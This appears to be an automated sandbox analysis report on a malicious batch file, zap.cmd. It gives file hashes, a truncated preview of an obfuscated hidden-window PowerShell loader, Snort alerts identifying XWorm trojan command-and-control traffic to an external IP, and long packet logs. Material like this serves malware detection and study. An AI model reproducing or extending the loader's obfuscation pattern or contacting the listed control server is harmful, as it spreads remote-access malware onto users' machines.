                                                                                                    Preview:...................................FL..................F.".. ...-/.v.....52"D...z.:{.............................:..DG..Yr?.D..U..k0.&...&......vk.v....m...D.....B"D.......t...CFSF..1.....CW.^..AppData...t.Y^...H.g.3..(.....gVA.G..k...@......CW.^.X.............................%..A.p.p.D.a.t.a...B.V.1......X....Roaming.@......CW.^.X.............................j.R.o.a.m.i.n.g.....\.1.....DW.N..MICROS~1..D......CW.^.X............................9D..M.i.c.r.o.s.o.f.t.....V.1.....DWO`..Windows.@......CW.^DWO`.............................W.i.n.d.o.w.s.......1.....CW.^..STARTM~1..n......CW.^DW.`....................D.....=X..S.t.a.r.t. .M.e.n.u...@.s.h.e.l.l.3.2...d.l.l.,.-.2.1.7.8.6.......1.....DW.N..Programs..j......CW.^DW.`....................@.........P.r.o.g.r.a.m.s...@.s.h.e.l.l.3.2...d.l.l.,.-.2.1.7.8.2.....n.1......O.K..WINDOW~1..V......CW.^DW.`..........................d...W.i.n.d.o.w.s. .P.o.w.e.r.S.h.e.l.l.....z.2......O.I .WINDOW~1.LNK..^......CW.^.X......Q...........

                                                                                                    C:\Users\user\AppData\Roaming\Microsoft\Windows\Recent\CustomDestinations\EOGWFIPGPL7TCFT7EKZ8.temp

                                                                                                    Download File
                                                                                                    Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                                    File Type:data
                                                                                                    Category:dropped
                                                                                                    Size (bytes):6221
                                                                                                    Entropy (8bit):3.7455257191721056
                                                                                                    Encrypted:false
                                                                                                    SSDEEP:96:bvgYWm33CxH2NkvhkvCCt6ri7J8Hpri7JzHb:bvnWmyWZ6uQud
                                                                                                    MD5:19045132C639EFE199ACD272F2D3A202
                                                                                                    SHA1:5151CB3B6D357A8015E9E543E62ACCF2BBABD404
                                                                                                    SHA-256:701A66A2F891A84FB5DB642E6DFA32D77225B30B13475FDCF2390ED5E7B55233
                                                                                                    SHA-512:6D9F8759FE163C94F3BC53E73AF126D266C3DA929400FBDE1067D4A55CAEA1003C5E15A9A9AAB50941A453B4416367E3B07DC08206AED1F5B104F5389BE2F39D
                                                                                                    Malicious:false
                                                                                                    Preview:...................................FL..................F.".. ...-/.v.....52"D...z.:{.............................:..DG..Yr?.D..U..k0.&...&......vk.v....m...D.....B"D.......t...CFSF..1.....CW.^..AppData...t.Y^...H.g.3..(.....gVA.G..k...@......CW.^.X.............................%..A.p.p.D.a.t.a...B.V.1......X....Roaming.@......CW.^.X.............................j.R.o.a.m.i.n.g.....\.1.....DW.N..MICROS~1..D......CW.^.X............................9D..M.i.c.r.o.s.o.f.t.....V.1.....DWO`..Windows.@......CW.^DWO`.............................W.i.n.d.o.w.s.......1.....CW.^..STARTM~1..n......CW.^DW.`....................D.....=X..S.t.a.r.t. .M.e.n.u...@.s.h.e.l.l.3.2...d.l.l.,.-.2.1.7.8.6.......1.....DW.N..Programs..j......CW.^DW.`....................@.........P.r.o.g.r.a.m.s...@.s.h.e.l.l.3.2...d.l.l.,.-.2.1.7.8.2.....n.1......O.K..WINDOW~1..V......CW.^DW.`..........................d...W.i.n.d.o.w.s. .P.o.w.e.r.S.h.e.l.l.....z.2......O.I .WINDOW~1.LNK..^......CW.^.X......Q...........

                                                                                                    Static File Info

                                                                                                    General

                                                                                                    File type:ASCII text, with very long lines (6428), with no line terminators
                                                                                                    Entropy (8bit):5.263147124918306
                                                                                                    TrID:
                                                                                                      File name:zap.cmd
                                                                                                      File size:6'428 bytes
                                                                                                      MD5:0b65dcbdc755a516181f47d69f5aee10
                                                                                                      SHA1:fc9319ec254c2be1b7ba5174d36d142c1ce20440
                                                                                                      SHA256:00c866d489bd11732441171441b8db0a135c76bdb7bf5c3adb4da66e97dbed43
                                                                                                      SHA512:e37aba32337a5bf8793721d8d9b9582c906b9820ace2a831d1f6e9548e6631942df0bdf6b56f07c1420fa7ade2d3a1e34bb27cab4ddc7d57a42672919f1ead1c
                                                                                                      SSDEEP:96:vEWuwXqdcs0faFF/oW8NYEpyGakOwJyZLLi8lTxd7Qhn004g6bnecFhZ3WjS:vurF8NY8yGywAL2Ox5QV004gIFhn
                                                                                                      TLSH:3ED16B8061862B8915A64FD1FC138D1D0D0C4A3B11498EE3627BEDDA70FF469969CFBC
                                                                                                      File Content Preview:start /min powershell.exe -windowstyle hidden "$Monostelous = 1;$Fomented='Sub';$Fomented+='strin';$Fomented+='g';Function Upstair91($Contrive){$Noontide=$Contrive.Length-$Monostelous;For($Bortskaffelsesmetode=5;$Bortskaffelsesmetode -lt $Noontide;$Bortsk

                                                                                                      File Icon

                                                                                                      Icon Hash:9686878b929a9886

                                                                                                      Network Behavior

                                                                                                      Snort IDS Alerts

                                                                                                      TimestampProtocolSIDMessageSource PortDest PortSource IPDest IP
                                                                                                      05/23/24-21:07:05.956515TCP2852874ETPRO TROJAN Win32/XWorm CnC PING Command Inbound M288964974112.202.180.134192.168.2.4
                                                                                                      05/23/24-21:06:27.424847TCP2855924ETPRO TROJAN Win32/XWorm V3 CnC Command - PING Outbound497418896192.168.2.412.202.180.134
                                                                                                      05/23/24-21:07:17.694580TCP2852870ETPRO TROJAN Win32/XWorm CnC Checkin - Generic Prefix Bytes88964974112.202.180.134192.168.2.4

                                                                                                      Network Port Distribution

                                                                                                      TCP Packets

                                                                                                      TimestampSource PortDest PortSource IPDest IP
                                                                                                      May 23, 2024 21:05:14.939724922 CEST49730443192.168.2.4172.67.170.105
                                                                                                      May 23, 2024 21:05:14.939769983 CEST44349730172.67.170.105192.168.2.4
                                                                                                      May 23, 2024 21:05:14.939882994 CEST49730443192.168.2.4172.67.170.105
                                                                                                      May 23, 2024 21:05:14.950274944 CEST49730443192.168.2.4172.67.170.105
                                                                                                      May 23, 2024 21:05:14.950290918 CEST44349730172.67.170.105192.168.2.4
                                                                                                      May 23, 2024 21:05:15.448169947 CEST44349730172.67.170.105192.168.2.4
                                                                                                      May 23, 2024 21:05:15.448249102 CEST49730443192.168.2.4172.67.170.105
                                                                                                      May 23, 2024 21:05:15.451679945 CEST49730443192.168.2.4172.67.170.105
                                                                                                      May 23, 2024 21:05:15.451690912 CEST44349730172.67.170.105192.168.2.4
                                                                                                      May 23, 2024 21:05:15.452009916 CEST44349730172.67.170.105192.168.2.4
                                                                                                      May 23, 2024 21:05:15.464751959 CEST49730443192.168.2.4172.67.170.105
                                                                                                      May 23, 2024 21:05:15.510493040 CEST44349730172.67.170.105192.168.2.4
                                                                                                      May 23, 2024 21:05:15.700798988 CEST44349730172.67.170.105192.168.2.4
                                                                                                      May 23, 2024 21:05:15.700901031 CEST44349730172.67.170.105192.168.2.4
                                                                                                      May 23, 2024 21:05:15.700953960 CEST49730443192.168.2.4172.67.170.105
                                                                                                      May 23, 2024 21:05:15.710711956 CEST49730443192.168.2.4172.67.170.105
                                                                                                      May 23, 2024 21:05:15.824160099 CEST49731443192.168.2.469.31.136.57
                                                                                                      May 23, 2024 21:05:15.824213982 CEST4434973169.31.136.57192.168.2.4
                                                                                                      May 23, 2024 21:05:15.824301004 CEST49731443192.168.2.469.31.136.57
                                                                                                      May 23, 2024 21:05:15.828078985 CEST49731443192.168.2.469.31.136.57
                                                                                                      May 23, 2024 21:05:15.828093052 CEST4434973169.31.136.57192.168.2.4
                                                                                                      May 23, 2024 21:05:16.515505075 CEST4434973169.31.136.57192.168.2.4
                                                                                                      May 23, 2024 21:05:16.515671968 CEST49731443192.168.2.469.31.136.57
                                                                                                      May 23, 2024 21:05:16.518976927 CEST49731443192.168.2.469.31.136.57
                                                                                                      May 23, 2024 21:05:16.519001961 CEST4434973169.31.136.57192.168.2.4
                                                                                                      May 23, 2024 21:05:16.519241095 CEST4434973169.31.136.57192.168.2.4
                                                                                                      May 23, 2024 21:05:16.520169973 CEST49731443192.168.2.469.31.136.57
                                                                                                      May 23, 2024 21:05:16.562635899 CEST4434973169.31.136.57192.168.2.4
                                                                                                      May 23, 2024 21:05:16.801898003 CEST4434973169.31.136.57192.168.2.4
                                                                                                      May 23, 2024 21:05:16.801924944 CEST4434973169.31.136.57192.168.2.4
                                                                                                      May 23, 2024 21:05:16.801940918 CEST4434973169.31.136.57192.168.2.4
                                                                                                      May 23, 2024 21:05:16.802052021 CEST49731443192.168.2.469.31.136.57
                                                                                                      May 23, 2024 21:05:16.802082062 CEST4434973169.31.136.57192.168.2.4
                                                                                                      May 23, 2024 21:05:16.802103043 CEST49731443192.168.2.469.31.136.57
                                                                                                      May 23, 2024 21:05:16.802134037 CEST49731443192.168.2.469.31.136.57
                                                                                                      May 23, 2024 21:05:16.822633028 CEST4434973169.31.136.57192.168.2.4
                                                                                                      May 23, 2024 21:05:16.822664022 CEST4434973169.31.136.57192.168.2.4
                                                                                                      May 23, 2024 21:05:16.822760105 CEST49731443192.168.2.469.31.136.57
                                                                                                      May 23, 2024 21:05:16.822760105 CEST49731443192.168.2.469.31.136.57
                                                                                                      May 23, 2024 21:05:16.822825909 CEST4434973169.31.136.57192.168.2.4
                                                                                                      May 23, 2024 21:05:16.822889090 CEST49731443192.168.2.469.31.136.57
                                                                                                      May 23, 2024 21:05:16.897732973 CEST4434973169.31.136.57192.168.2.4
                                                                                                      May 23, 2024 21:05:16.897758007 CEST4434973169.31.136.57192.168.2.4
                                                                                                      May 23, 2024 21:05:16.897808075 CEST49731443192.168.2.469.31.136.57
                                                                                                      May 23, 2024 21:05:16.897830963 CEST4434973169.31.136.57192.168.2.4
                                                                                                      May 23, 2024 21:05:16.897850037 CEST49731443192.168.2.469.31.136.57
                                                                                                      May 23, 2024 21:05:16.897866964 CEST49731443192.168.2.469.31.136.57
                                                                                                      May 23, 2024 21:05:16.914695978 CEST4434973169.31.136.57192.168.2.4
                                                                                                      May 23, 2024 21:05:16.914716005 CEST4434973169.31.136.57192.168.2.4
                                                                                                      May 23, 2024 21:05:16.914778948 CEST49731443192.168.2.469.31.136.57
                                                                                                      May 23, 2024 21:05:16.914802074 CEST4434973169.31.136.57192.168.2.4
                                                                                                      May 23, 2024 21:05:16.914849997 CEST49731443192.168.2.469.31.136.57
                                                                                                      May 23, 2024 21:05:16.926743031 CEST4434973169.31.136.57192.168.2.4
                                                                                                      May 23, 2024 21:05:16.926762104 CEST4434973169.31.136.57192.168.2.4
                                                                                                      May 23, 2024 21:05:16.926832914 CEST49731443192.168.2.469.31.136.57
                                                                                                      May 23, 2024 21:05:16.926851988 CEST4434973169.31.136.57192.168.2.4
                                                                                                      May 23, 2024 21:05:16.926888943 CEST49731443192.168.2.469.31.136.57
                                                                                                      May 23, 2024 21:05:16.939132929 CEST4434973169.31.136.57192.168.2.4
                                                                                                      May 23, 2024 21:05:16.939156055 CEST4434973169.31.136.57192.168.2.4
                                                                                                      May 23, 2024 21:05:16.939245939 CEST49731443192.168.2.469.31.136.57
                                                                                                      May 23, 2024 21:05:16.939260960 CEST4434973169.31.136.57192.168.2.4
                                                                                                      May 23, 2024 21:05:16.939349890 CEST49731443192.168.2.469.31.136.57
                                                                                                      May 23, 2024 21:05:16.992712021 CEST4434973169.31.136.57192.168.2.4
                                                                                                      May 23, 2024 21:05:16.992777109 CEST4434973169.31.136.57192.168.2.4
                                                                                                      May 23, 2024 21:05:16.992908001 CEST49731443192.168.2.469.31.136.57
                                                                                                      May 23, 2024 21:05:16.992925882 CEST4434973169.31.136.57192.168.2.4
                                                                                                      May 23, 2024 21:05:16.992949009 CEST49731443192.168.2.469.31.136.57
                                                                                                      May 23, 2024 21:05:16.992965937 CEST49731443192.168.2.469.31.136.57
                                                                                                      May 23, 2024 21:05:17.004592896 CEST4434973169.31.136.57192.168.2.4
                                                                                                      May 23, 2024 21:05:17.004620075 CEST4434973169.31.136.57192.168.2.4
                                                                                                      May 23, 2024 21:05:17.004826069 CEST49731443192.168.2.469.31.136.57
                                                                                                      May 23, 2024 21:05:17.004842043 CEST4434973169.31.136.57192.168.2.4
                                                                                                      May 23, 2024 21:05:17.004878998 CEST49731443192.168.2.469.31.136.57
                                                                                                      May 23, 2024 21:05:17.011492014 CEST4434973169.31.136.57192.168.2.4
                                                                                                      May 23, 2024 21:05:17.011514902 CEST4434973169.31.136.57192.168.2.4
                                                                                                      May 23, 2024 21:05:17.011687994 CEST49731443192.168.2.469.31.136.57
                                                                                                      May 23, 2024 21:05:17.011703968 CEST4434973169.31.136.57192.168.2.4
                                                                                                      May 23, 2024 21:05:17.011805058 CEST49731443192.168.2.469.31.136.57
                                                                                                      May 23, 2024 21:05:17.021979094 CEST4434973169.31.136.57192.168.2.4
                                                                                                      May 23, 2024 21:05:17.022001028 CEST4434973169.31.136.57192.168.2.4
                                                                                                      May 23, 2024 21:05:17.022236109 CEST49731443192.168.2.469.31.136.57
                                                                                                      May 23, 2024 21:05:17.022296906 CEST4434973169.31.136.57192.168.2.4
                                                                                                      May 23, 2024 21:05:17.022367001 CEST49731443192.168.2.469.31.136.57
                                                                                                      May 23, 2024 21:05:17.080913067 CEST4434973169.31.136.57192.168.2.4
                                                                                                      May 23, 2024 21:05:17.080934048 CEST4434973169.31.136.57192.168.2.4
                                                                                                      May 23, 2024 21:05:17.081118107 CEST49731443192.168.2.469.31.136.57
                                                                                                      May 23, 2024 21:05:17.081146955 CEST4434973169.31.136.57192.168.2.4
                                                                                                      May 23, 2024 21:05:17.081201077 CEST49731443192.168.2.469.31.136.57
                                                                                                      May 23, 2024 21:05:17.089541912 CEST4434973169.31.136.57192.168.2.4
                                                                                                      May 23, 2024 21:05:17.089560032 CEST4434973169.31.136.57192.168.2.4
                                                                                                      May 23, 2024 21:05:17.089644909 CEST49731443192.168.2.469.31.136.57
                                                                                                      May 23, 2024 21:05:17.089662075 CEST4434973169.31.136.57192.168.2.4
                                                                                                      May 23, 2024 21:05:17.089704990 CEST49731443192.168.2.469.31.136.57
                                                                                                      May 23, 2024 21:05:17.096003056 CEST4434973169.31.136.57192.168.2.4
                                                                                                      May 23, 2024 21:05:17.096019983 CEST4434973169.31.136.57192.168.2.4
                                                                                                      May 23, 2024 21:05:17.096079111 CEST49731443192.168.2.469.31.136.57
                                                                                                      May 23, 2024 21:05:17.096095085 CEST4434973169.31.136.57192.168.2.4
                                                                                                      May 23, 2024 21:05:17.096132040 CEST49731443192.168.2.469.31.136.57
                                                                                                      May 23, 2024 21:05:17.101818085 CEST4434973169.31.136.57192.168.2.4
                                                                                                      May 23, 2024 21:05:17.101835966 CEST4434973169.31.136.57192.168.2.4
                                                                                                      May 23, 2024 21:05:17.101897955 CEST49731443192.168.2.469.31.136.57
                                                                                                      May 23, 2024 21:05:17.101911068 CEST4434973169.31.136.57192.168.2.4
                                                                                                      May 23, 2024 21:05:17.101948977 CEST49731443192.168.2.469.31.136.57
                                                                                                      May 23, 2024 21:05:17.107053041 CEST4434973169.31.136.57192.168.2.4
                                                                                                      May 23, 2024 21:05:17.107073069 CEST4434973169.31.136.57192.168.2.4
                                                                                                      May 23, 2024 21:05:17.107142925 CEST49731443192.168.2.469.31.136.57
                                                                                                      May 23, 2024 21:05:17.107166052 CEST4434973169.31.136.57192.168.2.4
                                                                                                      May 23, 2024 21:05:17.107213020 CEST49731443192.168.2.469.31.136.57
                                                                                                      May 23, 2024 21:05:17.111898899 CEST4434973169.31.136.57192.168.2.4
                                                                                                      May 23, 2024 21:05:17.111920118 CEST4434973169.31.136.57192.168.2.4
                                                                                                      May 23, 2024 21:05:17.112102985 CEST49731443192.168.2.469.31.136.57
                                                                                                      May 23, 2024 21:05:17.112126112 CEST4434973169.31.136.57192.168.2.4
                                                                                                      May 23, 2024 21:05:17.112181902 CEST49731443192.168.2.469.31.136.57
                                                                                                      May 23, 2024 21:05:17.116184950 CEST4434973169.31.136.57192.168.2.4
                                                                                                      May 23, 2024 21:05:17.116202116 CEST4434973169.31.136.57192.168.2.4
                                                                                                      May 23, 2024 21:05:17.116271019 CEST49731443192.168.2.469.31.136.57
                                                                                                      May 23, 2024 21:05:17.116278887 CEST4434973169.31.136.57192.168.2.4
                                                                                                      May 23, 2024 21:05:17.116322041 CEST49731443192.168.2.469.31.136.57
                                                                                                      May 23, 2024 21:05:17.149960041 CEST4434973169.31.136.57192.168.2.4
                                                                                                      May 23, 2024 21:05:17.149981976 CEST4434973169.31.136.57192.168.2.4
                                                                                                      May 23, 2024 21:05:17.150077105 CEST49731443192.168.2.469.31.136.57
                                                                                                      May 23, 2024 21:05:17.150090933 CEST4434973169.31.136.57192.168.2.4
                                                                                                      May 23, 2024 21:05:17.150132895 CEST49731443192.168.2.469.31.136.57
                                                                                                      May 23, 2024 21:05:17.173877954 CEST4434973169.31.136.57192.168.2.4
                                                                                                      May 23, 2024 21:05:17.173903942 CEST4434973169.31.136.57192.168.2.4
                                                                                                      May 23, 2024 21:05:17.174041033 CEST49731443192.168.2.469.31.136.57
                                                                                                      May 23, 2024 21:05:17.174050093 CEST4434973169.31.136.57192.168.2.4
                                                                                                      May 23, 2024 21:05:17.174091101 CEST49731443192.168.2.469.31.136.57
                                                                                                      May 23, 2024 21:05:17.178220987 CEST4434973169.31.136.57192.168.2.4
                                                                                                      May 23, 2024 21:05:17.178237915 CEST4434973169.31.136.57192.168.2.4
                                                                                                      May 23, 2024 21:05:17.178309917 CEST49731443192.168.2.469.31.136.57
                                                                                                      May 23, 2024 21:05:17.178317070 CEST4434973169.31.136.57192.168.2.4
                                                                                                      May 23, 2024 21:05:17.178354025 CEST49731443192.168.2.469.31.136.57
                                                                                                      May 23, 2024 21:05:17.181860924 CEST4434973169.31.136.57192.168.2.4
                                                                                                      May 23, 2024 21:05:17.181878090 CEST4434973169.31.136.57192.168.2.4
                                                                                                      May 23, 2024 21:05:17.181945086 CEST49731443192.168.2.469.31.136.57
                                                                                                      May 23, 2024 21:05:17.181953907 CEST4434973169.31.136.57192.168.2.4
                                                                                                      May 23, 2024 21:05:17.181998014 CEST49731443192.168.2.469.31.136.57
                                                                                                      May 23, 2024 21:05:17.185034037 CEST4434973169.31.136.57192.168.2.4
                                                                                                      May 23, 2024 21:05:17.185050964 CEST4434973169.31.136.57192.168.2.4
                                                                                                      May 23, 2024 21:05:17.185116053 CEST49731443192.168.2.469.31.136.57
                                                                                                      May 23, 2024 21:05:17.185136080 CEST4434973169.31.136.57192.168.2.4
                                                                                                      May 23, 2024 21:05:17.185174942 CEST49731443192.168.2.469.31.136.57
                                                                                                      May 23, 2024 21:05:17.189728975 CEST4434973169.31.136.57192.168.2.4
                                                                                                      May 23, 2024 21:05:17.189747095 CEST4434973169.31.136.57192.168.2.4
                                                                                                      May 23, 2024 21:05:17.189812899 CEST49731443192.168.2.469.31.136.57
                                                                                                      May 23, 2024 21:05:17.189834118 CEST4434973169.31.136.57192.168.2.4
                                                                                                      May 23, 2024 21:05:17.189877033 CEST49731443192.168.2.469.31.136.57
                                                                                                      May 23, 2024 21:05:17.190272093 CEST4434973169.31.136.57192.168.2.4
                                                                                                      May 23, 2024 21:05:17.190287113 CEST4434973169.31.136.57192.168.2.4
                                                                                                      May 23, 2024 21:05:17.190337896 CEST49731443192.168.2.469.31.136.57
                                                                                                      May 23, 2024 21:05:17.190347910 CEST4434973169.31.136.57192.168.2.4
                                                                                                      May 23, 2024 21:05:17.190382957 CEST49731443192.168.2.469.31.136.57
                                                                                                      May 23, 2024 21:05:17.193552017 CEST4434973169.31.136.57192.168.2.4
                                                                                                      May 23, 2024 21:05:17.193567038 CEST4434973169.31.136.57192.168.2.4
                                                                                                      May 23, 2024 21:05:17.193624020 CEST49731443192.168.2.469.31.136.57
                                                                                                      May 23, 2024 21:05:17.193634033 CEST4434973169.31.136.57192.168.2.4
                                                                                                      May 23, 2024 21:05:17.193670034 CEST49731443192.168.2.469.31.136.57
                                                                                                      May 23, 2024 21:05:17.243639946 CEST4434973169.31.136.57192.168.2.4
                                                                                                      May 23, 2024 21:05:17.243674040 CEST4434973169.31.136.57192.168.2.4
                                                                                                      May 23, 2024 21:05:17.243895054 CEST49731443192.168.2.469.31.136.57
                                                                                                      May 23, 2024 21:05:17.243963003 CEST4434973169.31.136.57192.168.2.4
                                                                                                      May 23, 2024 21:05:17.244029999 CEST49731443192.168.2.469.31.136.57
                                                                                                      May 23, 2024 21:05:17.266666889 CEST4434973169.31.136.57192.168.2.4
                                                                                                      May 23, 2024 21:05:17.266688108 CEST4434973169.31.136.57192.168.2.4
                                                                                                      May 23, 2024 21:05:17.266783953 CEST49731443192.168.2.469.31.136.57
                                                                                                      May 23, 2024 21:05:17.266797066 CEST4434973169.31.136.57192.168.2.4
                                                                                                      May 23, 2024 21:05:17.266833067 CEST49731443192.168.2.469.31.136.57
                                                                                                      May 23, 2024 21:05:17.269018888 CEST4434973169.31.136.57192.168.2.4
                                                                                                      May 23, 2024 21:05:17.269033909 CEST4434973169.31.136.57192.168.2.4
                                                                                                      May 23, 2024 21:05:17.269097090 CEST49731443192.168.2.469.31.136.57
                                                                                                      May 23, 2024 21:05:17.269103050 CEST4434973169.31.136.57192.168.2.4
                                                                                                      May 23, 2024 21:05:17.269135952 CEST49731443192.168.2.469.31.136.57
                                                                                                      May 23, 2024 21:05:17.270855904 CEST4434973169.31.136.57192.168.2.4
                                                                                                      May 23, 2024 21:05:17.270872116 CEST4434973169.31.136.57192.168.2.4
                                                                                                      May 23, 2024 21:05:17.270929098 CEST49731443192.168.2.469.31.136.57
                                                                                                      May 23, 2024 21:05:17.270936012 CEST4434973169.31.136.57192.168.2.4
                                                                                                      May 23, 2024 21:05:17.270967960 CEST49731443192.168.2.469.31.136.57
                                                                                                      May 23, 2024 21:05:17.271509886 CEST4434973169.31.136.57192.168.2.4
                                                                                                      May 23, 2024 21:05:17.271557093 CEST49731443192.168.2.469.31.136.57
                                                                                                      May 23, 2024 21:05:17.271568060 CEST4434973169.31.136.57192.168.2.4
                                                                                                      May 23, 2024 21:05:17.271583080 CEST4434973169.31.136.57192.168.2.4
                                                                                                      May 23, 2024 21:05:17.271619081 CEST49731443192.168.2.469.31.136.57
                                                                                                      May 23, 2024 21:05:17.271954060 CEST49731443192.168.2.469.31.136.57
                                                                                                      May 23, 2024 21:06:01.410221100 CEST49738443192.168.2.4172.67.170.105
                                                                                                      May 23, 2024 21:06:01.410260916 CEST44349738172.67.170.105192.168.2.4
                                                                                                      May 23, 2024 21:06:01.410346985 CEST49738443192.168.2.4172.67.170.105
                                                                                                      May 23, 2024 21:06:01.445537090 CEST49738443192.168.2.4172.67.170.105
                                                                                                      May 23, 2024 21:06:01.445552111 CEST44349738172.67.170.105192.168.2.4
                                                                                                      May 23, 2024 21:06:01.944508076 CEST44349738172.67.170.105192.168.2.4
                                                                                                      May 23, 2024 21:06:01.944644928 CEST49738443192.168.2.4172.67.170.105
                                                                                                      May 23, 2024 21:06:02.030260086 CEST49738443192.168.2.4172.67.170.105
                                                                                                      May 23, 2024 21:06:02.030271053 CEST44349738172.67.170.105192.168.2.4
                                                                                                      May 23, 2024 21:06:02.030571938 CEST44349738172.67.170.105192.168.2.4
                                                                                                      May 23, 2024 21:06:02.030632019 CEST49738443192.168.2.4172.67.170.105
                                                                                                      May 23, 2024 21:06:02.059449911 CEST49738443192.168.2.4172.67.170.105
                                                                                                      May 23, 2024 21:06:02.106504917 CEST44349738172.67.170.105192.168.2.4
                                                                                                      May 23, 2024 21:06:02.342128992 CEST44349738172.67.170.105192.168.2.4
                                                                                                      May 23, 2024 21:06:02.342190981 CEST44349738172.67.170.105192.168.2.4
                                                                                                      May 23, 2024 21:06:02.342396975 CEST49738443192.168.2.4172.67.170.105
                                                                                                      May 23, 2024 21:06:02.411101103 CEST49738443192.168.2.4172.67.170.105
                                                                                                      May 23, 2024 21:06:02.411120892 CEST44349738172.67.170.105192.168.2.4
                                                                                                      May 23, 2024 21:06:02.559186935 CEST49739443192.168.2.469.31.136.17
                                                                                                      May 23, 2024 21:06:02.559217930 CEST4434973969.31.136.17192.168.2.4
                                                                                                      May 23, 2024 21:06:02.559282064 CEST49739443192.168.2.469.31.136.17
                                                                                                      May 23, 2024 21:06:02.560595989 CEST49739443192.168.2.469.31.136.17
                                                                                                      May 23, 2024 21:06:02.560606003 CEST4434973969.31.136.17192.168.2.4
                                                                                                      May 23, 2024 21:06:03.254306078 CEST4434973969.31.136.17192.168.2.4
                                                                                                      May 23, 2024 21:06:03.254426003 CEST49739443192.168.2.469.31.136.17
                                                                                                      May 23, 2024 21:06:04.632193089 CEST49739443192.168.2.469.31.136.17
                                                                                                      May 23, 2024 21:06:04.632227898 CEST4434973969.31.136.17192.168.2.4
                                                                                                      May 23, 2024 21:06:04.632580996 CEST4434973969.31.136.17192.168.2.4
                                                                                                      May 23, 2024 21:06:04.632648945 CEST49739443192.168.2.469.31.136.17
                                                                                                      May 23, 2024 21:06:04.647842884 CEST49739443192.168.2.469.31.136.17
                                                                                                      May 23, 2024 21:06:04.690493107 CEST4434973969.31.136.17192.168.2.4
                                                                                                      May 23, 2024 21:06:04.899141073 CEST4434973969.31.136.17192.168.2.4
                                                                                                      May 23, 2024 21:06:04.899167061 CEST4434973969.31.136.17192.168.2.4
                                                                                                      May 23, 2024 21:06:04.899188995 CEST4434973969.31.136.17192.168.2.4
                                                                                                      May 23, 2024 21:06:04.899362087 CEST49739443192.168.2.469.31.136.17
                                                                                                      May 23, 2024 21:06:04.899370909 CEST4434973969.31.136.17192.168.2.4
                                                                                                      May 23, 2024 21:06:04.899492025 CEST49739443192.168.2.469.31.136.17
                                                                                                      May 23, 2024 21:06:04.925668955 CEST4434973969.31.136.17192.168.2.4
                                                                                                      May 23, 2024 21:06:04.925693989 CEST4434973969.31.136.17192.168.2.4
                                                                                                      May 23, 2024 21:06:04.925966978 CEST49739443192.168.2.469.31.136.17
                                                                                                      May 23, 2024 21:06:04.925977945 CEST4434973969.31.136.17192.168.2.4
                                                                                                      May 23, 2024 21:06:04.926062107 CEST49739443192.168.2.469.31.136.17
                                                                                                      May 23, 2024 21:06:04.929308891 CEST4434973969.31.136.17192.168.2.4
                                                                                                      May 23, 2024 21:06:04.929392099 CEST4434973969.31.136.17192.168.2.4
                                                                                                      May 23, 2024 21:06:04.929408073 CEST49739443192.168.2.469.31.136.17
                                                                                                      May 23, 2024 21:06:04.929512024 CEST49739443192.168.2.469.31.136.17
                                                                                                      May 23, 2024 21:06:04.929718971 CEST49739443192.168.2.469.31.136.17
                                                                                                      May 23, 2024 21:06:04.929730892 CEST4434973969.31.136.17192.168.2.4
                                                                                                      May 23, 2024 21:06:04.929794073 CEST49739443192.168.2.469.31.136.17
                                                                                                      May 23, 2024 21:06:04.929845095 CEST49739443192.168.2.469.31.136.17
                                                                                                      May 23, 2024 21:06:12.657044888 CEST497418896192.168.2.412.202.180.134
                                                                                                      May 23, 2024 21:06:12.672736883 CEST88964974112.202.180.134192.168.2.4
                                                                                                      May 23, 2024 21:06:12.672811031 CEST497418896192.168.2.412.202.180.134
                                                                                                      May 23, 2024 21:06:12.843139887 CEST497418896192.168.2.412.202.180.134
                                                                                                      May 23, 2024 21:06:12.848172903 CEST88964974112.202.180.134192.168.2.4
                                                                                                      May 23, 2024 21:06:27.424846888 CEST497418896192.168.2.412.202.180.134
                                                                                                      May 23, 2024 21:06:27.429986954 CEST88964974112.202.180.134192.168.2.4
                                                                                                      May 23, 2024 21:06:27.607033968 CEST88964974112.202.180.134192.168.2.4
                                                                                                      May 23, 2024 21:06:27.777259111 CEST497418896192.168.2.412.202.180.134
                                                                                                      May 23, 2024 21:06:35.987562895 CEST88964974112.202.180.134192.168.2.4
                                                                                                      May 23, 2024 21:06:36.095386028 CEST497418896192.168.2.412.202.180.134
                                                                                                      May 23, 2024 21:06:41.988146067 CEST497418896192.168.2.412.202.180.134
                                                                                                      May 23, 2024 21:06:41.997056961 CEST88964974112.202.180.134192.168.2.4
                                                                                                      May 23, 2024 21:06:42.172116041 CEST88964974112.202.180.134192.168.2.4
                                                                                                      May 23, 2024 21:06:42.282954931 CEST497418896192.168.2.412.202.180.134
                                                                                                      May 23, 2024 21:06:56.565175056 CEST497418896192.168.2.412.202.180.134
                                                                                                      May 23, 2024 21:06:56.596362114 CEST88964974112.202.180.134192.168.2.4
                                                                                                      May 23, 2024 21:06:56.765199900 CEST88964974112.202.180.134192.168.2.4
                                                                                                      May 23, 2024 21:06:56.892601013 CEST497418896192.168.2.412.202.180.134
                                                                                                      May 23, 2024 21:07:05.956515074 CEST88964974112.202.180.134192.168.2.4
                                                                                                      May 23, 2024 21:07:06.002237082 CEST497418896192.168.2.412.202.180.134
                                                                                                      May 23, 2024 21:07:11.277381897 CEST497418896192.168.2.412.202.180.134
                                                                                                      May 23, 2024 21:07:11.282458067 CEST88964974112.202.180.134192.168.2.4
                                                                                                      May 23, 2024 21:07:11.451356888 CEST88964974112.202.180.134192.168.2.4
                                                                                                      May 23, 2024 21:07:11.502082109 CEST497418896192.168.2.412.202.180.134
                                                                                                      May 23, 2024 21:07:16.471575975 CEST497418896192.168.2.412.202.180.134
                                                                                                      May 23, 2024 21:07:16.476563931 CEST88964974112.202.180.134192.168.2.4
                                                                                                      May 23, 2024 21:07:17.686922073 CEST88964974112.202.180.134192.168.2.4
                                                                                                      May 23, 2024 21:07:17.694560051 CEST88964974112.202.180.134192.168.2.4
                                                                                                      May 23, 2024 21:07:17.694580078 CEST88964974112.202.180.134192.168.2.4
                                                                                                      May 23, 2024 21:07:17.694623947 CEST497418896192.168.2.412.202.180.134
                                                                                                      May 23, 2024 21:07:17.694747925 CEST497418896192.168.2.412.202.180.134

                                                                                                      UDP Packets

                                                                                                      TimestampSource PortDest PortSource IPDest IP
                                                                                                      May 23, 2024 21:05:14.897078037 CEST5707353192.168.2.41.1.1.1
                                                                                                      May 23, 2024 21:05:14.908605099 CEST53570731.1.1.1192.168.2.4
                                                                                                      May 23, 2024 21:05:15.713093996 CEST5642053192.168.2.41.1.1.1
